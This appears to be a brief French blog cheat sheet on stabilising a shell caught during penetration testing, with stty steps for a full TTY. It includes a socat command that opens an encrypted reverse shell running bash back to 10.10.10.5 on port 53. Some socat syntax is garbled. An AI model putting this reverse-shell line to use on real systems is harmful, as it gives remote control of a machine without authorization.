Stabiliser son shell

export term=XTERM

ctrl+Z

stty raw -echo; fg

reset

stty -a #pour savoir le nombre de lignes et colonnes

stty rows
stty cols

socat OPENSSL-LISTEN:53,cert=encrypt.pem,verify=0 TCP-L:53 FILE:`tty`,raw,echo=0

socat OPENSSL:53,verify=0 TCP:10.10.10.5:53 EXEC:”bash -li”,pty,stderr,sigint,setsid,sane #connect back to it

Leave a Reply